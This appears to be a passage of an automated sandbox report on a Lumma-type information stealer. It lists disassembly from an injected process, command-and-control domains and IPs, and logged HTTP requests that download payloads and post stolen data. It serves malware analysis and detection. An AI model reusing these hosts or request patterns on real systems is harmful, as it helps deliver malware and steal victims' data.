Source: Binary string: System.pdb) source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdbMZ@ source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdbl source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER250C.tmp.dmp.29.dr
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000000.2626820511.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000013.00000002.4106639355.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000014.00000002.3064617756.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000014.00000000.2627426001.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 0000001A.00000000.2764355472.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 0000001A.00000002.3104887965.0000000000402000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: System.Core.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Windows.Forms.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87FBAE FindFirstFileExW, 20_2_6C87FBAE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [edi+0Ch] 16_2_03053260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+50h] 16_2_030691C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+1Ch] 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_03062E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 16_2_03087E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+70h] 16_2_03067DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 16_2_03067DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp] 16_2_03089C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_0308A479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+30h] 16_2_0305FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+00000200h] 16_2_0305FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 16_2_03066CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then push eax 16_2_03083CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_0306B360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 16_2_030733B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esi+08h] 16_2_030643E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h 16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [03094A9Ch] 16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 16_2_03081BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then lea ebp, dword ptr [esp+03h] 16_2_03076210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [edx], 0000h 16_2_03063A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 16_2_03053A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h 16_2_030682CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 16_2_0306B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_0306B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 16_2_03061937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, word ptr [ebx+eax*4] 16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 16_2_0307617A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [03094970h] 16_2_030741A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_0305A000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h 16_2_0306D810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ecx], ax 16_2_03065871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h 16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_03088880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, eax 16_2_030538D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 16_2_030630F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 16_2_030630F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov al, 01h 16_2_0308A706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [esi+eax] 16_2_03086710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h 16_2_030737B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_03063678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then inc ebx 16_2_030666B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 16_2_03066EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 16_2_03061D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 16_2_03052DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 16_2_03063DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 16_2_030765F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 16_2_0306EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 16_2_0305E450

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.144.253.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: indexterityszcoxp.shop
Source: Malware configuration extractor URLs: lariatedzugspd.shop
Source: Malware configuration extractor URLs: callosallsaospz.shop
Source: Malware configuration extractor URLs: outpointsozp.shop
Source: Malware configuration extractor URLs: liernessfornicsa.shop
Source: Malware configuration extractor URLs: upknittsoappz.shop
Source: Malware configuration extractor URLs: shepherdlyopzc.shop
Source: Malware configuration extractor URLs: unseaffarignsk.shop
Source: Malware configuration extractor URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor URLs: http://olinsw.ws/tmp/index.php
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: rentry.co
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 10
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:62293 -> 193.222.96.24:4449
Source: global traffic TCP traffic: 192.168.2.4:62319 -> 94.156.79.190:4449
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:43:56 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View IP Address: 107.173.160.139 107.173.160.139
Source: Joe Sandbox View IP Address: 107.173.160.137 107.173.160.137
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9147
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 166871
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1263
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
